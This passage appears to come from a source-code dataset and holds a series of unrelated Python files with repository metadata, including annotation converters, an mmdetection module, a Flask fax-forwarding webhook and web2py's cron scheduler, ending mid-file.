voc_obj = pascalvoc.PascalVOC(imagedataset.dataset)
voc_obj.extract(voc_ann_dir)
df = voc_obj.get_dataset()
ann, cls = voc_obj.get_annotations()
coco_obj = coco.COCO(df)
coco_obj.set_annotations(ann)
coco_obj.set_classes(cls)
data = coco_obj.translate()
coco_obj.archive(save_dir, data)
@staticmethod
def voc2csv(dataset_dir: str,
voc_ann_dir: str,
save_dir: str):
""" convert pascal VOC into .csv
:param dataset_dir: relative path current folder, or absolute path to the main folder of the image dataset
:param voc_ann_dir: relative path current folder, or absolute path to the main folder of the annotated file
:param save_dir: .csv file saving location
:return: None
"""
imagedataset = ImgData.extract(dataset_dir)
voc_obj = pascalvoc.PascalVOC(imagedataset.dataset)
voc_obj.extract(voc_ann_dir)
df = voc_obj.get_dataset()
ann, cls = voc_obj.get_annotations()
csv_obj = csv.CSV(df)
csv_obj.set_annotations(ann)
csv_obj.set_classes(cls)
csv_fomatted = csv_obj.translate()
csv_obj.archive(save_dir, csv_fomatted)
| 36.335366
| 116
| 0.639201
|
c0f37ebf2b3997fcd728c5a9c93ed47c5865338a
| 639
|
py
|
Python
|
gupb/controller/__init__.py
|
Lipskoe/GUPB
|
0dd0e6ff2603465aa1ebb514a7745eb09726b447
|
[
"MIT"
] | 6
|
2020-10-06T14:29:45.000Z
|
2020-10-18T22:45:39.000Z
|
gupb/controller/__init__.py
|
Lipskoe/GUPB
|
0dd0e6ff2603465aa1ebb514a7745eb09726b447
|
[
"MIT"
] | 8
|
2020-10-10T10:36:21.000Z
|
2022-01-02T14:10:07.000Z
|
gupb/controller/__init__.py
|
Lipskoe/GUPB
|
0dd0e6ff2603465aa1ebb514a7745eb09726b447
|
[
"MIT"
] | 17
|
2020-10-08T19:08:45.000Z
|
2022-01-17T02:40:30.000Z
|
from abc import abstractmethod
from typing import Protocol
from gupb.model import arenas
from gupb.model import characters
class Controller(Protocol):
@abstractmethod
def reset(self, arena_description: arenas.ArenaDescription) -> None:
raise NotImplementedError
@abstractmethod
def decide(self, knowledge: characters.ChampionKnowledge) -> characters.Action:
raise NotImplementedError
@property
@abstractmethod
def name(self) -> str:
raise NotImplementedError
@property
@abstractmethod
def preferred_tabard(self) -> characters.Tabard:
raise NotImplementedError
| 23.666667
| 83
| 0.733959
|
ba2b2f7e6638f73a58005ef1b1abc5791582e221
| 315
|
py
|
Python
|
users/migrations/0002_remove_profile_email.py
|
wadi-1000/Therapi
|
f18268be821d7a73b6e0cc0f10dad91efbd05dba
|
[
"MIT"
] | null | null | null |
users/migrations/0002_remove_profile_email.py
|
wadi-1000/Therapi
|
f18268be821d7a73b6e0cc0f10dad91efbd05dba
|
[
"MIT"
] | null | null | null |
users/migrations/0002_remove_profile_email.py
|
wadi-1000/Therapi
|
f18268be821d7a73b6e0cc0f10dad91efbd05dba
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.6 on 2021-09-29 12:24
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='profile',
name='email',
),
]
| 17.5
| 47
| 0.574603
|
4335b4c0d77752f25a02081ababc27baabc917ad
| 1,783
|
py
|
Python
|
hamilton.py
|
bturkoglu/hamilton-path-using-python-with-turkey-cities
|
c627b2077fe3de9427806886ad3cd26ac2a4d5ab
|
[
"MIT"
] | 1
|
2022-02-23T16:09:39.000Z
|
2022-02-23T16:09:39.000Z
|
hamilton.py
|
bturkoglu/hamilton-path-using-python-with-turkey-cities
|
c627b2077fe3de9427806886ad3cd26ac2a4d5ab
|
[
"MIT"
] | null | null | null |
hamilton.py
|
bturkoglu/hamilton-path-using-python-with-turkey-cities
|
c627b2077fe3de9427806886ad3cd26ac2a4d5ab
|
[
"MIT"
] | null | null | null |
import itertools
def dosyaoku():
baslik = True
with open(dosya,'r') as f:
for line in f:
satir = line.strip().split(sep='\t')
print('satir:',satir)
if baslik:
baslik = False
for s in satir:
sehirler.append(s)
print('Sehirler:',sehirler)
continue
sehir = satir[0]
for sira, mesafe in enumerate(satir[1:]):
anahtar = (sehir, sehirler[sira])
mesafeler[anahtar] = int(mesafe)
print('Mesafeler:',mesafeler)
def hesapla():
global ilk_sehir, gezinti_sehirleri
# gezinti_sehirleri küme'ye çevrilecek. Kümenin içinde ilk_sehir varsa kümeden çıkartılacak.
# gezintiKumesi = set(gezinti_sehirleri)
# gezintiKumesi.discard(ilk_sehir)
gezintiKumesi = gezinti_sehirleri
sehir_adedi = len(gezintiKumesi)
en_kisa_mesafe = 1e10
en_kisa_yol = ''
# P(gezintiKumesinin, sehir_adedi) yani permutasyon kümeleri bulunacak.
for kume in itertools.permutations(gezintiKumesi, sehir_adedi):
yolsirasi =(ilk_sehir,) + kume + (ilk_sehir,)
topmesafe = 0
for i in range(len(yolsirasi)-1):
anahtar = (yolsirasi[i], yolsirasi[i+1])
topmesafe += mesafeler[anahtar]
print('Mesafe: %5d Yol Sirasi: %s' % (topmesafe, yolsirasi))
if en_kisa_mesafe > topmesafe:
en_kisa_mesafe = topmesafe
en_kisa_yol = yolsirasi
print('SONUÇ: En Kısa Mesafe: %5d En Kısa Yol Sirasi: %s' % (en_kisa_mesafe, en_kisa_yol))
sehirler = list()
mesafeler = dict()
ilk_sehir = 'a'
gezinti_sehirleri = ('b','c','d','e')
dosya = 'yol1.txt'
dosyaoku()
hesapla()
input('ikincitest için bir tuşa basınız')
sehirler = list()
mesafeler = dict()
ilk_sehir = 'Konya'
gezinti_sehirleri = ('Ankara','Bursa','Eskişehir','Antalya')
dosya = 'turkiye.txt'
dosyaoku()
hesapla()
| 22.858974
| 94
| 0.668536
|
dadf313b8e4f35583ea5039667e383401e29cffe
| 3,222
|
py
|
Python
|
mmdetection/mmdet/models/roi_heads/roi_extractors/generic_roi_extractor.py
|
lizhaoliu-Lec/Conformer
|
577cff26b78b338f035c075727c408fca3272208
|
[
"Apache-2.0"
] | null | null | null |
mmdetection/mmdet/models/roi_heads/roi_extractors/generic_roi_extractor.py
|
lizhaoliu-Lec/Conformer
|
577cff26b78b338f035c075727c408fca3272208
|
[
"Apache-2.0"
] | null | null | null |
mmdetection/mmdet/models/roi_heads/roi_extractors/generic_roi_extractor.py
|
lizhaoliu-Lec/Conformer
|
577cff26b78b338f035c075727c408fca3272208
|
[
"Apache-2.0"
] | null | null | null |
from mmcv.cnn.bricks import build_plugin_layer
from mmcv.runner import force_fp32
from mmdet.models.builder import ROI_EXTRACTORS
from .base_roi_extractor import BaseRoIExtractor
@ROI_EXTRACTORS.register_module()
class GenericRoIExtractor(BaseRoIExtractor):
"""Extract RoI features from all level feature maps levels.
This is the implementation of `A novel Region of Interest Extraction Layer
for Instance Segmentation <https://arxiv.org/abs/2004.13665>`_.
Args:
aggregation (str): The method to aggregate multiple feature maps.
Options are 'sum', 'concat'. Default: 'sum'.
pre_cfg (dict | None): Specify pre-processing modules. Default: None.
post_cfg (dict | None): Specify post-processing modules. Default: None.
kwargs (keyword arguments): Arguments that are the same
as :class:`BaseRoIExtractor`.
"""
def __init__(self,
aggregation='sum',
pre_cfg=None,
post_cfg=None,
**kwargs):
super(GenericRoIExtractor, self).__init__(**kwargs)
assert aggregation in ['sum', 'concat']
self.aggregation = aggregation
self.with_post = post_cfg is not None
self.with_pre = pre_cfg is not None
# build pre/post processing modules
if self.with_post:
self.post_module = build_plugin_layer(post_cfg, '_post_module')[1]
if self.with_pre:
self.pre_module = build_plugin_layer(pre_cfg, '_pre_module')[1]
@force_fp32(apply_to=('feats',), out_fp16=True)
def forward(self, feats, rois, roi_scale_factor=None):
"""Forward function."""
if len(feats) == 1:
return self.roi_layers[0](feats[0], rois)
out_size = self.roi_layers[0].output_size
num_levels = len(feats)
roi_feats = feats[0].new_zeros(
rois.size(0), self.out_channels, *out_size)
# some times rois is an empty tensor
if roi_feats.shape[0] == 0:
return roi_feats
if roi_scale_factor is not None:
rois = self.roi_rescale(rois, roi_scale_factor)
# mark the starting channels for concat mode
start_channels = 0
for i in range(num_levels):
roi_feats_t = self.roi_layers[i](feats[i], rois)
end_channels = start_channels + roi_feats_t.size(1)
if self.with_pre:
# apply pre-processing to a RoI extracted from each layer
roi_feats_t = self.pre_module(roi_feats_t)
if self.aggregation == 'sum':
# and sum them all
roi_feats += roi_feats_t
else:
# and concat them along channel dimension
roi_feats[:, start_channels:end_channels] = roi_feats_t
# update channels starting position
start_channels = end_channels
# check if concat channels match at the end
if self.aggregation == 'concat':
assert start_channels == self.out_channels
if self.with_post:
# apply post-processing before return the result
roi_feats = self.post_module(roi_feats)
return roi_feats
| 38.357143
| 79
| 0.629112
|
f4d9cb02880f5f130f70dc4bd3e9255902c26d52
| 7,033
|
py
|
Python
|
pyhonScripts/transform_vnp_html_cmd_v4.py
|
markfawcett/business-papers
|
2f1d71079cd33a722ac8f419c76cd7a4227b482d
|
[
"BSD-3-Clause"
] | null | null | null |
pyhonScripts/transform_vnp_html_cmd_v4.py
|
markfawcett/business-papers
|
2f1d71079cd33a722ac8f419c76cd7a4227b482d
|
[
"BSD-3-Clause"
] | 5
|
2020-06-27T18:11:38.000Z
|
2021-05-21T16:31:02.000Z
|
pyhonScripts/transform_vnp_html_cmd_v4.py
|
markfawcett/business-papers
|
2f1d71079cd33a722ac8f419c76cd7a4227b482d
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/local/bin/python3
# module needed to parse command line arguments
import sys
# for parsing and sorting XML
from lxml import html # type: ignore
from lxml.etree import SubElement, iselement # type: ignore
# stuff needed for working with file paths
# from os import path
from pathlib import Path
# regular expresions
import re
# for getting todays date
from datetime import date
# golbal variables you may want to change
file_extension = '.html' # this is added to with the date in a particular form
def main():
if len(sys.argv) != 4:
print("\nThis script takes 3 arguments:\n1.\tThe path to the file you want to porces.\n2.\tthe template file name.\n3.\tThe VnP date in the form YYMMDD")
exit()
input_file_name = sys.argv[1]
template_file_name = sys.argv[2]
today_string = sys.argv[3]
fix_VnP_HTML(input_file_name, template_file_name, today_string=today_string)
def fix_VnP_HTML(input_file_name: str, template_file_name: str,
today_string: str = '', output_folder: str = '') -> Path:
# fisrt print the full location of the input file
print('Input file is at: {}'.format(Path(input_file_name).resolve()))
input_root = html.parse(input_file_name).getroot()
output_tree = html.parse(template_file_name)
output_root = output_tree.getroot()
# first get the VnP number from the input
vnP_number_element = input_root.find('.//div[@class="VnPNumberBox"]/p')
if iselement(vnP_number_element) and vnP_number_element.text:
vnP_number = vnP_number_element.text
else:
vnP_number = ''
# print(vnP_number)
# add this to the ouput
meta_source = output_root.find('head/meta[@name="Source"]')
if iselement(meta_source) and 'content' in meta_source.attrib:
meta_source.attrib['content'] += ' ' + vnP_number
title_element = output_root.find('head/title')
if iselement(title_element) and title_element.text:
title_element.text += ' ' + vnP_number + ')'
issueNumberParra = output_root.find('.//p[@class="VPIssueNumber"]')
if iselement(issueNumberParra):
issueNumberParra.text = vnP_number
# now get the date from the input
date_element = input_root.find('.//*[@class="DateTitle"]')
if date_element is not None and date_element.text:
vnP_day_of_week = date_element.text.split(' ', 1)[0]
vnP_date = date_element.text.split(' ', 1)[1]
else:
vnP_day_of_week = 'Noday'
vnP_date = 'Num Month Year'
# add this to the output
h1_title = output_root.find('.//h1[@id="mainTitle"]')
if h1_title is not None:
h1_title.text = 'Votes and Proceedings'
SubElement(h1_title, 'br').tail = f'{vnP_day_of_week} {vnP_date}'
# also add the date to the botttom of the page
# prepared_date_element = output_root.find('.//div[@id="footerBlockDate"]/p')
# if prepared_date_element is not None and prepared_date_element.text:
# prepared_date_element.text += vnP_date
# put a heading is called 'Chamber business'
# if thefirst elemetn has, The house met at in its thing put Chamber busines sheading
xpath = '//p[contains(@class,"ItemTimingHeading")]'
first_p = input_root.xpath(xpath)
if len(first_p):
new_heading = html.Element('h2')
new_heading.text = 'Chamber business'
new_heading.classes.add('underline')
first_p[0].getparent().insert(0, new_heading)
# change the input root so that all the paragraphs with numbered spans have another span
spans = input_root.findall('.//p[@class="numbered InDesignBold"]/span[last()]')
# print(spans)
for span in spans:
if span.tail:
temp_text = span.tail
else:
temp_text = ''
span.tail = None
span_parent_para = span.getparent()
span_parent_para.append(html.fromstring('<span class="text">' + temp_text + '</span>'))
# Add IDs and perminant ancors to the html
# Added at the request of IDMS
# need to get all the heading elements
xpath = '//*[@class="numbered InDesignBold"]/span[@class="text"]|//h2[@class="underline"]|//h3'
linkables = input_root.xpath(xpath)
# print(len(linkables))
for i, heading in enumerate(linkables):
# generate id text
id_text = f'anchor-{i}'
if heading.get('id', default=None):
heading.set('name', heading.get('id'))
heading.set('id', id_text)
# adding this will add the anchor to the last span
spans = heading.xpath('./span[normalize-space(text())]|./strong[normalize-space(text())]')
if len(spans) > 1:
heading = spans[-1]
anchor = SubElement(heading, 'a')
permalink_for = 'Permalink for ' + heading.text_content()
anchor.set('href', '#' + id_text)
anchor.set('aria-label', 'Anchor')
anchor.set('title', permalink_for)
anchor.set('data-anchor-icon', '§')
anchor.set('class', 'anchor-link')
# do some clean ups
for em in input_root.xpath('//em[@class="Oblique"]'):
em.classes.remove('Oblique')
for strong in input_root.xpath('//strong[@class="_5-bold"]'):
strong.classes.remove('_5-bold')
# get a handle in the output root for appending stuff from the input
append_point = output_root.find('.//div[@id="content-goes-here"]')
# append_point.append(html.fromstring('<p class="VPIssueNumber">' + vnP_number + '</p>'))
if append_point is None:
input('Error: The template root does not have a div with an id of "mainTextBlock" '
'so the script does not know where to put the elements from the input')
exit()
# put the main text flow into the output
main_text_flow_element = input_root.find('.//div[@class="MainTextFlow"]')
append_point.extend(main_text_flow_element)
if today_string is None:
output_file_name = get_date_short() + file_extension
else:
output_file_name = today_string + file_extension
output_file_name = f'vnp{output_file_name}'
if output_folder:
output_file_path = Path(output_folder).joinpath(output_file_name)
else:
# output_file_path = path.join(base_path, output_file_name)
output_file_path = Path(input_file_name).parent.joinpath(output_file_name)
output_tree.write(str(output_file_path), encoding='UTF-8', method="html", xml_declaration=False)
print(f'Output file is at: {output_file_path.resolve()}')
return output_file_path
def do_find_n_replaces(string):
string = re.sub(r'> +', '>', string)
string = re.sub(r' +<', '<', string)
string = string.replace('&amp;nbsp;', ' ')
return string
def delete_element(element):
if iselement(element):
element.getparent().remove(element)
def get_date_short():
# get a date object for today
today = date.today()
# date string in the form 170627
today_string = today.strftime('%y%m%d')
return today_string
if __name__ == "__main__": main()
| 37.609626
| 161
| 0.664439
|
7c867f47524787bce4ebb07b2ed4bf83258427ed
| 895
|
py
|
Python
|
Fax/Forwarding Incoming Faxes to Email with Python/app.py
|
Slamhaus/guides
|
1bcf2997f52a0d2440ae447b2986c70695fa24ef
|
[
"MIT"
] | 1
|
2022-01-19T22:10:28.000Z
|
2022-01-19T22:10:28.000Z
|
Fax/Forwarding Incoming Faxes to Email with Python/app.py
|
Slamhaus/guides
|
1bcf2997f52a0d2440ae447b2986c70695fa24ef
|
[
"MIT"
] | 1
|
2022-02-21T10:39:36.000Z
|
2022-02-21T10:39:36.000Z
|
Fax/Forwarding Incoming Faxes to Email with Python/app.py
|
Slamhaus/guides
|
1bcf2997f52a0d2440ae447b2986c70695fa24ef
|
[
"MIT"
] | 3
|
2022-01-14T19:01:44.000Z
|
2022-03-31T00:51:52.000Z
|
import os
import requests
import pprint
from flask import Flask, request
app = Flask(__name__)
# Listen on route '/fax-webhook' for incoming GET/POST requests when a fax comes in
@app.route('/fax-webhook', methods=['POST'])
def fax_webhook():
# Forward incoming form data to email
send_email(pprint.pformat(request.form, indent=4))
return "200"
# Send email using MailGun API
def send_email(body):
return requests.post(
"https://api.mailgun.net/v3/" + os.environ['MAILGUN_DOMAIN'] + "/messages",
auth=("api", os.environ['MAILGUN_API_TOKEN']),
data={"from": os.environ['EMAIL_FROM'],
"to": [os.environ['EMAIL_TO']],
"subject": os.environ['EMAIL_SUBJECT'],
"text": body})
# Listen on '/' for default requests
@app.route('/')
def hello():
return "Hello World!"
if __name__ == '__main__':
app.run()
| 24.861111
| 83
| 0.639106
|
a3354f0f72729a8ff81ffb98fdca1c1c42dd849d
| 3,448
|
py
|
Python
|
trains/binding/frameworks/pytorch_bind.py
|
HubBucket-Team/trains
|
c817255a88e5c793b3fbc5b74eb9d5b1fc54ec2b
|
[
"Apache-2.0"
] | 1
|
2019-08-19T04:17:13.000Z
|
2019-08-19T04:17:13.000Z
|
trains/binding/frameworks/pytorch_bind.py
|
VonRosenchild/trains
|
c817255a88e5c793b3fbc5b74eb9d5b1fc54ec2b
|
[
"Apache-2.0"
] | null | null | null |
trains/binding/frameworks/pytorch_bind.py
|
VonRosenchild/trains
|
c817255a88e5c793b3fbc5b74eb9d5b1fc54ec2b
|
[
"Apache-2.0"
] | 1
|
2019-08-19T04:17:15.000Z
|
2019-08-19T04:17:15.000Z
|
import sys
import six
from pathlib2 import Path
from ...binding.frameworks.base_bind import PatchBaseModelIO
from ..frameworks import _patched_call, WeightsFileHandler, _Empty
from ..import_bind import PostImportHookPatching
from ...config import running_remotely
from ...model import Framework
class PatchPyTorchModelIO(PatchBaseModelIO):
__main_task = None
__patched = None
@staticmethod
def update_current_task(task, **_):
PatchPyTorchModelIO.__main_task = task
PatchPyTorchModelIO._patch_model_io()
PostImportHookPatching.add_on_import('torch', PatchPyTorchModelIO._patch_model_io)
@staticmethod
def _patch_model_io():
if PatchPyTorchModelIO.__patched:
return
if 'torch' not in sys.modules:
return
PatchPyTorchModelIO.__patched = True
# noinspection PyBroadException
try:
# hack: make sure tensorflow.__init__ is called
import torch
torch.save = _patched_call(torch.save, PatchPyTorchModelIO._save)
torch.load = _patched_call(torch.load, PatchPyTorchModelIO._load)
except ImportError:
pass
except Exception:
pass # print('Failed patching pytorch')
@staticmethod
def _save(original_fn, obj, f, *args, **kwargs):
ret = original_fn(obj, f, *args, **kwargs)
if not PatchPyTorchModelIO.__main_task:
return ret
if isinstance(f, six.string_types):
filename = f
elif hasattr(f, 'name'):
filename = f.name
# noinspection PyBroadException
try:
f.flush()
except Exception:
pass
else:
filename = None
# give the model a descriptive name based on the file name
# noinspection PyBroadException
try:
model_name = Path(filename).stem
except Exception:
model_name = None
WeightsFileHandler.create_output_model(obj, filename, Framework.pytorch, PatchPyTorchModelIO.__main_task,
singlefile=True, model_name=model_name)
return ret
@staticmethod
def _load(original_fn, f, *args, **kwargs):
if isinstance(f, six.string_types):
filename = f
elif hasattr(f, 'name'):
filename = f.name
else:
filename = None
if not PatchPyTorchModelIO.__main_task:
return original_fn(f, *args, **kwargs)
# register input model
empty = _Empty()
if running_remotely():
filename = WeightsFileHandler.restore_weights_file(empty, filename, Framework.pytorch,
PatchPyTorchModelIO.__main_task)
model = original_fn(filename or f, *args, **kwargs)
else:
# try to load model before registering, in case we fail
model = original_fn(filename or f, *args, **kwargs)
WeightsFileHandler.restore_weights_file(empty, filename, Framework.pytorch,
PatchPyTorchModelIO.__main_task)
if empty.trains_in_model:
# noinspection PyBroadException
try:
model.trains_in_model = empty.trains_in_model
except Exception:
pass
return model
| 33.475728
| 113
| 0.604118
|
a6d0dfcbbc999c2d0671c1c39bdd1ed0f81a9bdf
| 5,194
|
py
|
Python
|
src/signal_scope/signalScopeSetup.py
|
TLasguignes/signal_scope
|
ad2690df9c7a5f1502c5e7807568b7f4050fcc10
|
[
"BSD-3-Clause"
] | null | null | null |
src/signal_scope/signalScopeSetup.py
|
TLasguignes/signal_scope
|
ad2690df9c7a5f1502c5e7807568b7f4050fcc10
|
[
"BSD-3-Clause"
] | null | null | null |
src/signal_scope/signalScopeSetup.py
|
TLasguignes/signal_scope
|
ad2690df9c7a5f1502c5e7807568b7f4050fcc10
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import sys
import glob
import time
import traceback
from PythonQt import QtGui
class LocalTimeHelper(object):
def _getResolverFunction(self):
return lambda x: time.time()*1e6
class LookupHelper(object):
def __init__(self, lookups=()):
self._lookups = lookups
def __getitem__(self, i):
return LookupHelper(self._lookups + ([i],))
def __getattr__(self, attr):
return LookupHelper(self._lookups + (attr,))
def _getResolverFunction(self):
lookups = []
name = ''
for a in self._lookups:
if isinstance(a, str):
if len(name): name += '.'
name += '%s' % a
f = lambda msg, field, a=a: getattr(field, a)
else:
a = a[0]
if isinstance(a, int):
name += '[%d]' % a
f = lambda msg, field, a=a: field[a]
if isinstance(a, str):
name += "['%s']" % a
def f(msg, field, a=a, data=[]):
if not data:
data.append(field.index(a))
return data[0]
elif isinstance(a, LookupHelper):
key = a._lookups[-1][0]
subFunc = a._getResolverFunction()
name += '[%s]' % key #subFunc.__doc__
f = lambda msg, field, a=a: field[subFunc(msg)]
lookups.append(f)
def func(msg):
value = msg
for x in lookups:
value = x(msg, value)
return value
func.__doc__ = name
return func
def createSignalFunction(timeLookup, valueLookup):
t = timeLookup._getResolverFunction()
v = valueLookup._getResolverFunction()
def func(msg):
return t(msg).to_sec(), v(msg)
func.__doc__ = v.__doc__
return func
def decodeMessageFunction(messageBytes, messageType):
s = str(messageBytes)
# Use messageType string to import ros message type
# TODO:
# - find out if is this efficient - e.g. at 500Hz
# - cache the imported messages and skip importing those that have been
# - remove the LCM does for decoding
messagePackage,messageType= str.split(str(messageType),'/')
exec('from ' + messagePackage + '.msg import ' + messageType )
exec('p = ' + messageType + '()')
p.deserialize(s)
return p
msg = LookupHelper()
tNow = LocalTimeHelper()
def setFormatOptions(pointSize=None, timeWindow=None, curveStyle=None):
window = _mainWindow;
if pointSize is not None:
window.onPointSizeChanged(pointSize)
if timeWindow is not None:
window.onTimeWindowChanged(timeWindow)
if curveStyle is not None:
if curveStyle in ["dots","lines"]:
window.onCurveStyleChanged(curveStyle);
def addPlot(pointSize=None, timeWindow=None, yLimits=None):
plot = _mainWindow.addPlot()
if timeWindow is not None:
plot.setTimeWindow(timeWindow)
if yLimits is not None:
plot.setYAxisScale(yLimits[0], yLimits[1])
return plot
def getPlot():
plots = getPlots()
return plots[-1] if plots else None
def getPlots():
return _mainWindow.getPlots()
def removePlots():
_mainWindow.onRemoveAllPlots()
def addSignalFunction(channel, signalFunction, plot=None, color=None, wrap=True, label=None):
if plot is None:
plot = getPlot()
if plot is None:
plot = addPlot()
if color is not None:
rgb = [int(c*255) for c in color]
color = QtGui.QColor(*rgb)
else:
color = QtGui.QColor()
if wrap:
def _signalFunction(x):
t, v = signalFunction(x)
return t.to_sec(), float(v)
else:
_signalFunction = signalFunction
_mainWindow.addPythonSignal(plot, [channel, _signalFunction, label or signalFunction.__doc__, color])
def addSignalFunctions(channel, signalFunction, keys, keyLookup=None, plot=None, colors=None, labels=None):
def func(key, keyStr):
def f (msg):
t, x = signalFunction(msg)
return t, x[key]
if signalFunction.__doc__:
f.__doc__ = signalFunction.__doc__ + " " + keyStr
return f
if colors is None:
colors = [None] * len(keys)
if labels is None:
labels = [None] * len(keys)
for key, color, label in zip(keys, colors, labels):
keyStr = str(key)
if keyLookup is not None:
key = keyLookup[key]
addSignalFunction(channel, func(key,keyStr), plot=plot, color=color, label=label)
def addSignal(channel, timeLookup, valueLookup, plot=None, color=None, label=None):
signalFunction = createSignalFunction(timeLookup, valueLookup)
addSignalFunction(channel, signalFunction, plot=plot, color=color, wrap=False, label=label)
def addSignals(channel, timeLookup, valueLookup, keys, keyLookup=None, plot=None, colors=None, labels=None):
if colors is None:
colors = [None] * len(keys)
if labels is None:
labels = [None] * len(keys)
for key, color, label in zip(keys, colors, labels):
if keyLookup is not None:
key = keyLookup[key]
addSignal(channel, timeLookup, valueLookup[key], plot=plot, color=color, label=label)
| 26.100503
| 108
| 0.614555
|
8e6497b9eb8cbc98e054158db3a3b08697328963
| 13,111
|
py
|
Python
|
gluon/newcron.py
|
pav0n/web2py_ohka
|
2d8302e4d1bffc8c845f9e37638a86bb691a8107
|
[
"BSD-3-Clause"
] | 2
|
2017-02-02T00:31:48.000Z
|
2017-08-08T22:36:25.000Z
|
gluon/newcron.py
|
sloe/sloe_web2py
|
a1524d4da46ff851429a1de2022d852f8f2c8e53
|
[
"BSD-3-Clause"
] | null | null | null |
gluon/newcron.py
|
sloe/sloe_web2py
|
a1524d4da46ff851429a1de2022d852f8f2c8e53
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
| This file is part of the web2py Web Framework
| Created by Attila Csipa <web2py@csipa.in.rs>
| Modified by Massimo Di Pierro <mdipierro@cs.depaul.edu>
| License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
Cron-style interface
"""
import sys
import os
import threading
import logging
import time
import sched
import re
import datetime
import platform
import portalocker
import fileutils
try:
import cPickle as pickle
except:
import pickle
from gluon.settings import global_settings
logger = logging.getLogger("web2py.cron")
_cron_stopping = False
_cron_subprocs = []
def absolute_path_link(path):
"""
Returns an absolute path for the destination of a symlink
"""
if os.path.islink(path):
link = os.readlink(path)
if not os.path.isabs(link):
link = os.path.join(os.path.dirname(path), link)
else:
link = os.path.abspath(path)
return link
def stopcron():
"Graceful shutdown of cron"
global _cron_stopping
_cron_stopping = True
while _cron_subprocs:
proc = _cron_subprocs.pop()
if proc.poll() is None:
try:
proc.terminate()
except:
import traceback
traceback.print_exc()
class extcron(threading.Thread):
def __init__(self, applications_parent, apps=None):
threading.Thread.__init__(self)
self.setDaemon(False)
self.path = applications_parent
self.apps = apps
# crondance(self.path, 'external', startup=True, apps=self.apps)
def run(self):
if not _cron_stopping:
logger.debug('external cron invocation')
crondance(self.path, 'external', startup=False, apps=self.apps)
class hardcron(threading.Thread):
def __init__(self, applications_parent):
threading.Thread.__init__(self)
self.setDaemon(True)
self.path = applications_parent
crondance(self.path, 'hard', startup=True)
def launch(self):
if not _cron_stopping:
logger.debug('hard cron invocation')
crondance(self.path, 'hard', startup=False)
def run(self):
s = sched.scheduler(time.time, time.sleep)
logger.info('Hard cron daemon started')
while not _cron_stopping:
now = time.time()
s.enter(60 - now % 60, 1, self.launch, ())
s.run()
class softcron(threading.Thread):
def __init__(self, applications_parent):
threading.Thread.__init__(self)
self.path = applications_parent
# crondance(self.path, 'soft', startup=True)
def run(self):
if not _cron_stopping:
logger.debug('soft cron invocation')
crondance(self.path, 'soft', startup=False)
class Token(object):
def __init__(self, path):
self.path = os.path.join(path, 'cron.master')
if not os.path.exists(self.path):
fileutils.write_file(self.path, '', 'wb')
self.master = None
self.now = time.time()
def acquire(self, startup=False):
"""
Returns the time when the lock is acquired or
None if cron already running
lock is implemented by writing a pickle (start, stop) in cron.master
start is time when cron job starts and stop is time when cron completed
stop == 0 if job started but did not yet complete
if a cron job started within less than 60 seconds, acquire returns None
if a cron job started before 60 seconds and did not stop,
a warning is issue "Stale cron.master detected"
"""
if sys.platform == 'win32':
locktime = 59.5
else:
locktime = 59.99
if portalocker.LOCK_EX is None:
logger.warning('WEB2PY CRON: Disabled because no file locking')
return None
self.master = open(self.path, 'rb+')
try:
ret = None
portalocker.lock(self.master, portalocker.LOCK_EX)
try:
(start, stop) = pickle.load(self.master)
except:
(start, stop) = (0, 1)
if startup or self.now - start > locktime:
ret = self.now
if not stop:
# this happens if previous cron job longer than 1 minute
logger.warning('WEB2PY CRON: Stale cron.master detected')
logger.debug('WEB2PY CRON: Acquiring lock')
self.master.seek(0)
pickle.dump((self.now, 0), self.master)
self.master.flush()
finally:
portalocker.unlock(self.master)
if not ret:
# do this so no need to release
self.master.close()
return ret
def release(self):
"""
Writes into cron.master the time when cron job was completed
"""
if not self.master.closed:
portalocker.lock(self.master, portalocker.LOCK_EX)
logger.debug('WEB2PY CRON: Releasing cron lock')
self.master.seek(0)
(start, stop) = pickle.load(self.master)
if start == self.now: # if this is my lock
self.master.seek(0)
pickle.dump((self.now, time.time()), self.master)
portalocker.unlock(self.master)
self.master.close()
def rangetolist(s, period='min'):
retval = []
if s.startswith('*'):
if period == 'min':
s = s.replace('*', '0-59', 1)
elif period == 'hr':
s = s.replace('*', '0-23', 1)
elif period == 'dom':
s = s.replace('*', '1-31', 1)
elif period == 'mon':
s = s.replace('*', '1-12', 1)
elif period == 'dow':
s = s.replace('*', '0-6', 1)
m = re.compile(r'(\d+)-(\d+)/(\d+)')
match = m.match(s)
if match:
for i in range(int(match.group(1)), int(match.group(2)) + 1):
if i % int(match.group(3)) == 0:
retval.append(i)
return retval
def parsecronline(line):
task = {}
if line.startswith('@reboot'):
line = line.replace('@reboot', '-1 * * * *')
elif line.startswith('@yearly'):
line = line.replace('@yearly', '0 0 1 1 *')
elif line.startswith('@annually'):
line = line.replace('@annually', '0 0 1 1 *')
elif line.startswith('@monthly'):
line = line.replace('@monthly', '0 0 1 * *')
elif line.startswith('@weekly'):
line = line.replace('@weekly', '0 0 * * 0')
elif line.startswith('@daily'):
line = line.replace('@daily', '0 0 * * *')
elif line.startswith('@midnight'):
line = line.replace('@midnight', '0 0 * * *')
elif line.startswith('@hourly'):
line = line.replace('@hourly', '0 * * * *')
params = line.strip().split(None, 6)
if len(params) < 7:
return None
daysofweek = {'sun': 0, 'mon': 1, 'tue': 2, 'wed': 3, 'thu': 4,
'fri': 5, 'sat': 6}
for (s, id) in zip(params[:5], ['min', 'hr', 'dom', 'mon', 'dow']):
if not s in [None, '*']:
task[id] = []
vals = s.split(',')
for val in vals:
if val != '-1' and '-' in val and '/' not in val:
val = '%s/1' % val
if '/' in val:
task[id] += rangetolist(val, id)
elif val.isdigit() or val == '-1':
task[id].append(int(val))
elif id == 'dow' and val[:3].lower() in daysofweek:
task[id].append(daysofweek(val[:3].lower()))
task['user'] = params[5]
task['cmd'] = params[6]
return task
class cronlauncher(threading.Thread):
def __init__(self, cmd, shell=True):
threading.Thread.__init__(self)
if platform.system() == 'Windows':
shell = False
self.cmd = cmd
self.shell = shell
def run(self):
import subprocess
global _cron_subprocs
if isinstance(self.cmd, (list, tuple)):
cmd = self.cmd
else:
